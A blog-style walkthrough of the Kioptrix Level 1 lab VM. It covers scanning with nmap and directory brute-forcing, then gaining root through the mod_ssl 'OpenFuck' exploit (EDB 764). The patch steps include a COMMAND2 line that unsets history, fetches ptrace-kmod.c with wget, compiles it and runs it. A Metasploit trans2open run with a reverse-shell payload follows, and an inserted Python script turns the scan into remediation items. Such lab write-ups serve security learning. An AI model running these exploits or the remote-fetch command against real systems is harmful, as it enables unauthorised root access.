Tuesday, 04 October 2022

KIOPTRIX LEVEL 1 FLAG

Lab setup:
HOST/Windows : 192.168.1.x
KALI LINUX : 10.0.2.15 /NAT
KIOPTRIX : 192.168.56.103 /Host-only adapter


Ping from Windows to Kali: request timed out; ping from Windows to Kioptrix: success

Ping from Kali to Windows: request timed out; ping from Kali to Kioptrix: success


┌──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::9d69:7019:77fb:5b8  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:22:46:4f  txqueuelen 1000  (Ethernet)
        RX packets 14748  bytes 9594944 (9.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4262507  bytes 256663811 (244.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1000  bytes 111406 (108.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1000  bytes 111406 (108.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(root㉿kali)-[~]
└─# ping 192.168.56.103
PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.
64 bytes from 192.168.56.103: icmp_seq=1 ttl=254 time=1.15 ms
64 bytes from 192.168.56.103: icmp_seq=2 ttl=254 time=2.02 ms
64 bytes from 192.168.56.103: icmp_seq=3 ttl=254 time=1.76 ms
64 bytes from 192.168.56.103: icmp_seq=4 ttl=254 time=2.08 ms
64 bytes from 192.168.56.103: icmp_seq=5 ttl=254 time=1.79 ms
64 bytes from 192.168.56.103: icmp_seq=6 ttl=254 time=1.10 ms
--- 192.168.56.103 ping statistics ---
15 packets transmitted, 15 received, 0% packet loss, time 14411ms
rtt min/avg/max/mdev = 0.561/1.044/2.081/0.555 ms

                                                                             

┌──(root㉿kali)-[~]
└─# nmap -sV -A 192.168.56.103
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 02:36 EDT
Nmap scan report for 192.168.56.103 (192.168.56.103)
Host is up (0.00052s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2022-10-03T06:32:08+00:00; -1d00h05m25s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-title: 400 Bad Request
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: bridge|general purpose
Running (JUST GUESSING): Oracle Virtualbox (98%), QEMU (92%)
OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
Aggressive OS guesses: Oracle Virtualbox (98%), QEMU user mode network gateway (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: -1d00h05m25s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.23 ms 10.0.2.2 (10.0.2.2)
2   0.25 ms 192.168.56.103 (192.168.56.103)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 38.41 seconds
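As an added defensive example (not part of the original write-up), the Python script below turns the nmap banner and script lines above into a remediation list: SSHv1, Apache 1.3 with mod_ssl older than 2.8.7, SSLv2 with export-grade ciphers, an expired certificate and the TRACE method. The sample input is constructed from the scan output on this page, and `today` is assumed to be the scan date so the certificate check is reproducible.

```python
import re
from datetime import datetime

# Constructed sample: the relevant lines of the nmap -sV -A output shown above.
NMAP_OUTPUT = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_  Potentially risky methods: TRACE
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|   SSLv2 supported
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
"""


def triage(nmap_text, today=datetime(2022, 10, 4)):
    """Return (port, finding) tuples for the legacy exposures visible in the scan.
    NSE script lines (starting with '|') are attributed to the preceding port line;
    `today` is assumed to be the scan date so the certificate check is reproducible."""
    findings, port = [], None
    for line in nmap_text.splitlines():
        m = re.match(r"^(\d+)/tcp\s+open\s+\S+\s+(.*)$", line)
        if m:  # a port line: inspect the version banner
            port, banner = int(m.group(1)), m.group(2)
            if re.search(r"\bOpenSSH 2\.", banner):
                findings.append((port, "OpenSSH 2.x: end-of-life, upgrade"))
            if re.search(r"Apache(?: httpd)?/? ?1\.3\.", banner):
                findings.append((port, "Apache 1.3.x: end-of-life"))
            if re.search(r"mod_ssl/2\.8\.[0-6]\b", banner):
                findings.append((port, "mod_ssl < 2.8.7: SSLv2 handshake overflow (EDB-764)"))
            continue
        # script output lines belong to the port seen last
        if "Server supports SSHv1" in line:
            findings.append((port, "SSHv1 enabled: set Protocol 2 only"))
        elif "Potentially risky methods: TRACE" in line:
            findings.append((port, "HTTP TRACE enabled: TraceEnable off"))
        elif "SSLv2 supported" in line:
            findings.append((port, "SSLv2 enabled: disable in mod_ssl"))
        elif "EXPORT40" in line:
            findings.append((port, "export-grade cipher " + line.split()[-1]))
        elif line.startswith("|_Not valid after:"):
            expires = datetime.fromisoformat(line.split(":", 1)[1].strip())
            if expires < today:
                findings.append((port, f"certificate expired {expires.date()}"))
    return findings
```

Run `triage(NMAP_OUTPUT)` to get the list; each tuple pairs the port with the configuration change to make on the host.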

                                                                  

We can also use the command:
# enum4linux 192.168.56.103




Open a browser in Kali Linux to test port 80





To find out which directories exist on the server, use the following command:

---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/~operator (CODE:403|SIZE:273)
+ http://192.168.56.103/~root (CODE:403|SIZE:269)
+ http://192.168.56.103/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.56.103/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.56.103/manual/
==> DIRECTORY: http://192.168.56.103/mrtg/
==> DIRECTORY: http://192.168.56.103/usage/


PENETRATION TEST ON PORT 111:
From the nmap result above we obtained
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status

This means we can try a null-session connection:
# rpcclient -U "" 192.168.56.103


If this yields no user/account data, and creating a new account or changing an existing account/password also fails:

rpcclient $> srvinfo
        KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
        platform_id     :       500
        os version      :       4.5
        server type     :       0x9a03

rpcclient $> createdomuser adi
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 
then we have to move on to the next step......

PENETRATION TEST ON PORT 22:

From the nmap result above we obtained

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)

We check whether there is an exploit library that supports OpenSSH 2.9


Since there is nothing for version 2.9, we move on to the next penetration test...



PENETRATION TEST ON PORT 443:

The nmap result above is:
Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

Do the following:

# searchsploit apache 1.3.20



Open a browser and google the following to find the exploit:
mod_ssl/2.8.4 openssl/0.9.6b exploit



Or go to the following address: https://www.exploit-db.com/exploits/764



Download it....... the default download location is /home/kali/Downloads/764.c

┌──(root㉿kali)-[~]
└─# cd /home/kali/Downloads

┌──(root㉿kali)-[/home/kali/Downloads]
└─# ls
764.c

Or you can also use the 764.c file that ships with Kali Linux:

┌──(root㉿kali)-[/home/kali/Downloads]
└─# searchsploit openfuck
--------------------------------------------------------------------------------------- ---------------------
 Exploit Title                                                                         | Path
--------------------------------------------------------------------------------------- ---------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                  | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)            | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)            | unix/remote/47080.c
--------------------------------------------------------------------------------------- ---------------------
Shellcodes: No Results



Copy the file and then compile it....
# cp /usr/share/exploitdb/platforms/unix/remote/764.c /home/kali/Downloads/764.c

Open and edit the file
# vim OpenFuck.c

Add the openssl rc4 and md5 library headers
#include <openssl/rc4.h>
#include <openssl/md5.h>

Also modify the wget link address:
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
> apt-get install libssl-dev
> gcc -o OpenFuck 764.c -lcrypto

Run:
> ./OpenFuck
until it prints which target version must be used:


Trying out using the 0x6a option ....
> ./OpenFuck 0x6a 192.168.80.132 443 -c 40

It doesn't work. Next we try the other option,
> ./OpenFuck 0x6b 192.168.80.132 443 -c 40

Until we obtain ROOT:

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Congrats, you have root now....

Every CLI command will run here....you can add users, change passwords, etc...

IF THERE IS AN ERROR:


Update the libraries:
# apt-get install libssl-dev
# apt-get install libssl1.0-dev

The libssl1.0-dev command produces the following error:
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package libssl1.0-dev is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'libssl1.0-dev' has no installation candidate

It's manageable to install it if you first remove libssl-dev, but this removes other packages and breaks some functionality

sudo apt-get remove libssl-dev
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libpcre2-16-0 libpcre2-32-0 libpcre2-dev libpcre2-posix2 php-json pkg-config pkg-php-tools shtool
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
  libssl-dev php-dev php5.6-dev php7.0-dev php7.1-dev php7.2-dev php7.3-dev php7.4-dev php8.0-dev
BECAUSE:
Package libssl1.0-dev is not available, but is referred to by another package.

OR DOWNLOAD AND INSTALL MANUALLY: https://pkgs.org/download/libssl1.0.0


Then changes to make (including Paul's) are:

1. Add this below line 24 (the last #include):

#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16
2. Replace "COMMAND2" on (now) line 672:

#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
3. Add "const" to the beginning of (now) line 970:

const unsigned char *p, *end;
4. Replace the "if" on (now) line 1078 with:

if (EVP_PKEY_get1_RSA(pkey) == NULL) {
5. Replace the "encrypted_key_length" code on (now) line 1084 with:

encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
6. Install "libssl-dev" (if not already installed):

apt-get install libssl-dev
7. Compile!
# gcc -o OpenFuck 764.c -lcrypto



+++++++++++++++++++++++++++++++++++++++++


Until we obtain the OpenFuck exploit binary.

Next, change the file mode of OpenFuck so it can be executed (+777 or +755)
# chmod +755 OpenFuck

Finally type
./OpenFuck


Now providing the arguments to the exploit in order to get access.
./OpenFuck -b0 -c <Your IP> <Target IP>
At the end, boom, we are in as an administrator



Use .deb:
sudo apt install path_to_deb_file
sudo dpkg -i path_to_deb_file
Use tar.gz
tar -xzf archive-name.tar.gz
cd archive-name
./configure
make
sudo make install

cd ..

 
PENETRATION TEST ON PORT 139/SAMBA:
We can also get in by exploiting the Samba X.X bug.
Using the Metasploit tool we can check which smb version is running.

root@kali:~# msfconsole

msf5 > use auxiliary/scanner/smb/smb_version

msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.56.103

msf5 auxiliary(scanner/smb/smb_version) > run

By running those commands we learn that the smb is Samba version 2.2.1a

After we know the smb version, we search google.com for whether there is a vulnerability in that version. For example, we get the following Rapid7 bug link:

https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open

We try to get into the Kioptrix system using that security hole. Next we type the commands below to get root access inside the Kioptrix system.


root@kali:~# msfconsole

msf5 > use exploit/linux/samba/trans2open

msf5 exploit(linux/samba/trans2open) > set RHOSTS 192.168.56.103

msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell/reverse_tcp

msf5 exploit(linux/samba/trans2open) > exploit

Finally we become root



And we can now log in to the Kioptrix OS with the password we changed.


Refs:

https://fromzerotoone.in/en/posts/vulnhub-kioptrix-level-1/
https://steemit.com/security/@shifty0g/walkthrough-kioptrix-level-1-1
https://blog.sekolahhacker.com/write-up-kioptrix-level-1/
